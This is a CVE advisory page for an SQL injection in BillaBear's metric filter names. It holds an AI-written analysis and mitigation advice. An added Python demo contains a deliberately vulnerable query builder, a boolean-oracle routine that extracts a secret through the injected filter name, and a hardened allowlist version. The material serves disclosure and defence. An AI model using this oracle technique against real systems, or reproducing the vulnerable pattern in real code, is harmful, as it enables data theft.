CVE-2026-31069
Description
BillaBear (all versions prior to Jan 2026) contains a SQL Injection vulnerability in the EventRepository. User-controlled input from metric filter names and aggregation properties is directly interpolated into SQL queries using sprintf() without proper sanitization or identifier quoting. Although filter values are parameterized, the filter identifiers (keys) are not. An authenticated attacker with ROLE_ACCOUNT_MANAGER permissions can exploit this to execute arbitrary SQL commands.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
BillaBear versions prior to Jan 2026 have a SQL injection in EventRepository.php via metric filter names, allowing authenticated ROLE_ACCOUNT_MANAGER attackers to execute arbitrary SQL commands.
Vulnerability
BillaBear versions prior to January 2026 (including 2025.01.01, 2025.01.02, and 2025.01.03) are vulnerable to SQL injection in EventRepository.php [2][3]. The createCountSql() method uses sprintf() to interpolate user-controlled metric filter names and aggregation properties straight into the query text, with no validation and no identifier quoting. Only the filter values are bound as parameters; the filter names, which end up as column identifiers in the WHERE clause, are concatenated as-is [2][3]. Exploitation requires an authenticated session holding ROLE_ACCOUNT_MANAGER [2][3].
Exploitation
An authenticated user holding ROLE_ACCOUNT_MANAGER can define a metric whose filter name carries SQL rather than a column name [2]. When usage calculations run, sprintf() places that name into the WHERE clause of the count query, so the attacker-supplied text executes as SQL [2][3]. Parameter binding offers no protection here: bound parameters cover values only, and a database cannot bind an identifier, so the injected fragment runs even though every filter value is parameterized. The attack is reachable over the network through the metric configuration interface and needs no interaction from another user [2].
Impact
Successful exploitation lets the attacker run arbitrary SQL against the PostgreSQL database [2]. The injected statements execute with whatever privileges the application's database role holds, which in a billing system normally means reading, modifying or deleting subscription and billing data (customer records, invoices, usage events). ROLE_ACCOUNT_MANAGER already carries significant application-level access, but the injection escalates that to direct access to everything the application's database role can reach, bypassing the application's own authorization checks.
Mitigation
The vendor (BillaBear Ltd) had not released a patch as of the publication date, and no fixed version has been announced [2][3]. Until one is available: restrict ROLE_ACCOUNT_MANAGER to trusted users and review existing metric definitions for filter names that are not plain column names, since the payload is stored in the metric configuration and runs each time usage is calculated; run the application against a least-privilege database role so injected SQL cannot reach tables or statements the billing code does not need; and treat WAF rules for SQLi patterns in metric filter names as a stopgap only, because identifier injection needs no quote characters or comment markers and is easy to rewrite around a signature. The code-level fix is to validate filter names against the set of known column names (or at minimum quote them as identifiers) while keeping the values parameterized. The hosted version at billabear.com is managed by the vendor and may be updated separately [1]. Monitor the GitHub repository for a security release.
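The following is an added example, not BillaBear's code and not taken from the advisory: it reproduces in Python (using sqlite3 as a stand-in for PostgreSQL) the pattern described under Exploitation and Mitigation above, a count query whose filter values are parameterized while the filter names are formatted into the SQL text. The schema, table names, column names and the secret value are all constructed for the demonstration. The attacker function shows why value parameterization does not help: the only observable output is a count, so the injected identifier is used as a boolean oracle to read a secret from an unrelated table one character at a time. The hardened builder applies the two controls named in Mitigation, an allowlist of known column names plus identifier quoting.

```python
import sqlite3

# Constructed in-memory schema standing in for a usage-event store. Everything
# here (tables, columns, the secret) is invented for this example.
SCHEMA = """
CREATE TABLE events (id INTEGER PRIMARY KEY, customer_id TEXT, region TEXT, value REAL);
CREATE TABLE api_keys (id INTEGER PRIMARY KEY, secret TEXT);
INSERT INTO events (customer_id, region, value)
    VALUES ('c1', 'eu', 1.0), ('c1', 'us', 2.0), ('c2', 'eu', 3.0);
INSERT INTO api_keys (secret) VALUES ('sk_demo');
"""


def connect():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def count_sql_vulnerable(filters):
    """Model of the vulnerable pattern (not the project's createCountSql()):
    filter *values* are bound as parameters, but filter *names* are formatted
    straight into the WHERE clause, the Python equivalent of sprintf()."""
    clauses = " AND ".join("%s = ?" % name for name in filters)
    return "SELECT COUNT(*) FROM events WHERE " + clauses, list(filters.values())


def run_count(conn, builder, filters):
    """Build the count query with the given builder and execute it."""
    sql, params = builder(filters)
    return conn.execute(sql, params).fetchone()[0]


def extract_secret_via_oracle(conn, max_len=16):
    """Attacker model: the only output is the usage count, so the injected
    identifier becomes a boolean oracle. A non-zero count means the guessed
    character matched; the loop recovers api_keys.secret one position at a time."""
    alphabet = "abcdefghijklmnopqrstuvwxyz0123456789_"
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in alphabet:
            # The "filter name" is a scalar subquery; the guessed character is
            # passed as the (properly parameterized) filter value.
            probe = "(SELECT substr(secret, %d, 1) FROM api_keys)" % pos
            if run_count(conn, count_sql_vulnerable, {probe: ch}) > 0:
                recovered += ch
                break
        else:
            return recovered  # no character matched: end of the secret
    return recovered


# Hardened form: identifiers cannot be bound as parameters, so the defence is
# an allowlist of known column names plus identifier quoting. Values stay bound.
ALLOWED_FILTER_COLUMNS = frozenset({"customer_id", "region"})


def quote_identifier(name):
    """SQL-standard identifier quoting (PostgreSQL and SQLite): wrap in double
    quotes and double any embedded double quote."""
    return '"' + name.replace('"', '""') + '"'


def count_sql_hardened(filters, allowed=ALLOWED_FILTER_COLUMNS):
    clauses = []
    for name in filters:
        if name not in allowed:
            raise ValueError("unknown filter column: %r" % name)
        clauses.append(quote_identifier(name) + " = ?")
    return "SELECT COUNT(*) FROM events WHERE " + " AND ".join(clauses), list(filters.values())


def hardened_rejects(filters):
    """True if the hardened builder refuses the given filter names."""
    try:
        count_sql_hardened(filters)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    db = connect()
    print("legitimate count (region = eu):", run_count(db, count_sql_vulnerable, {"region": "eu"}))
    print("secret recovered through the count oracle:", extract_secret_via_oracle(db))
    print("hardened builder rejects the probe:",
          hardened_rejects({"(SELECT substr(secret, 1, 1) FROM api_keys)": "s"}))
```

Quoting alone would stop the probe from being parsed as a subquery (it would become a lookup of a non-existent column and fail), but it would still let a user filter on any real column of the table; the allowlist is what confines filtering to the columns the feature is meant to expose, and the quoting then only guards against reserved words and case folding. Note also that the probe contains no quote characters, comment markers or stacked statements, which is why signature-based WAF rules are a weak control for identifier injection.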
AI Insight generated on May 21, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products (2)
Patches (0)
No patches discovered yet.
Vulnerability mechanics
AI mechanics synthesis has not run for this CVE yet.
References (2)
News mentions (0)
No linked articles in our index yet.